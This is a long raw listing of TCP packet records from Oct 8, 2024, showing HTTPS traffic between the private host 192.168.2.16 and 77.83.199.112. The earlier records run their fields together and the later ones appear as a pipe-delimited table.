                                                                                                                                                  Oct 8, 2024 15:23:44.316165924 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.316174030 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.316220045 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.338990927 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.339019060 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.339090109 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.339101076 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.339157104 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.402967930 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.402992964 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.403080940 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.403100967 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.403444052 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.403898001 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.403913975 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.403969049 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.403980017 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.404181004 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.404845953 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.404864073 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.404930115 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.404941082 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.405015945 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.405891895 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.405911922 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.406080961 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.406090021 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.406591892 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.407525063 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.407543898 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.407604933 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.407614946 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.407675982 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.429436922 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.429486990 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.429544926 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.429574013 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.429585934 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.429614067 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.429872036 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.429913998 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.429946899 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.429955959 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.429981947 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.430005074 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.499521017 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499547958 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499599934 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499612093 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.499638081 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499667883 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.499675035 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499706984 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.499715090 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499751091 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499752998 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.499763966 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499788046 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499808073 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499821901 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.499829054 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499840021 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499882936 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.499918938 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.522768974 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.522793055 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.522861958 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.522876024 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.522922039 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.523160934 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.523183107 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.523226023 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.523233891 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.523256063 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.574198008 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585196972 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585270882 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585309982 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585325003 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585349083 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585371017 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585588932 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585649014 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585694075 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585702896 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585714102 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585751057 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585793018 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585803986 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585823059 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.883821964 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.883848906 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.971766949 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.971837997 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.971903086 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.971920013 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.971944094 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.971963882 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.973038912 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.973084927 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.973136902 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.973144054 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.973201036 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.973479033 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.973522902 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.973552942 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.973560095 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.973582029 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.973614931 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.974039078 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.974085093 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.974117041 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.974123955 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.974155903 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.974184990 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.974630117 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.974680901 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.974715948 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.974723101 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.974764109 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.974792957 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.975172043 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.975214958 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.975241899 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.975248098 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.975275040 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.975294113 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.000802040 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.000833988 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.000915051 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.000925064 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.000972033 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.066886902 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.066953897 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.067003965 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.067038059 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.067047119 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.067122936 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.067151070 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.067222118 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.067235947 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.067292929 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.067533016 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.067579985 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.067605019 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.067611933 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.067636967 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.067667007 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.068147898 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.068202019 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.068233013 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.068239927 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.068268061 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.068288088 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.068371058 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.068418980 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.068480968 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.068486929 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.068588018 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.069015026 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.069067001 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.069102049 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.069108009 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.069130898 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.069159985 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.069478035 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.069536924 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.069565058 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.069571018 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.069605112 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.069632053 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.091200113 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.091247082 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.091322899 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.091341019 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.091363907 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.091412067 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.157285929 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.157354116 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.157397032 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.157413960 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.157447100 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.157473087 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.157604933 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.157650948 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.157680988 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.157687902 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.157713890 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.157732010 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.158148050 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.158196926 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.158227921 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.158235073 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.158297062 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.158298016 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.158864975 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.158915043 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.158947945 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.158953905 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.158981085 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.158999920 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.159065008 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.159111023 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.159147024 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.159153938 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.159177065 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.159194946 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.159672976 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.159733057 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.159745932 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.159751892 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.159801006 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.159941912 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.160026073 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.160078049 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.160108089 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.160115957 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:45.160145044 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:45.160162926 CEST49707443192.168.2.1677.83.199.112
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 15:23:45.181914091 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.181967020 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.182017088 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.182046890 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.182073116 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.182090044 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.248248100 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.248320103 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.248363972 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.248384953 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.248404980 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.248424053 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.248477936 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.248522043 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.248538971 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.248548031 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.248590946 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.249371052 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.249389887 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.249439955 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.249449968 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.249459982 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.249486923 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.249890089 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.249933958 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.249959946 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.249965906 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.250001907 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.250024080 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.250036001 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.250081062 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.250092030 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.250109911 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.250139952 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.250163078 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.250931978 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.251002073 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.251014948 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.251027107 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.251075983 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.251089096 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.251187086 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.251247883 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.251262903 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.251271009 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.251322985 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.272878885 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.272923946 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.273015976 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.273015976 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.273037910 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.273121119 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.339250088 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.339340925 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.339405060 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.339416981 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.339446068 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.339466095 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.339582920 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.339624882 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.339662075 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.339669943 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.339693069 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.339718103 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.339823008 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.339864969 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.339894056 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.339900970 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.339930058 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.339946985 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:45.340230942 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.340298891 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:45.340312958 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
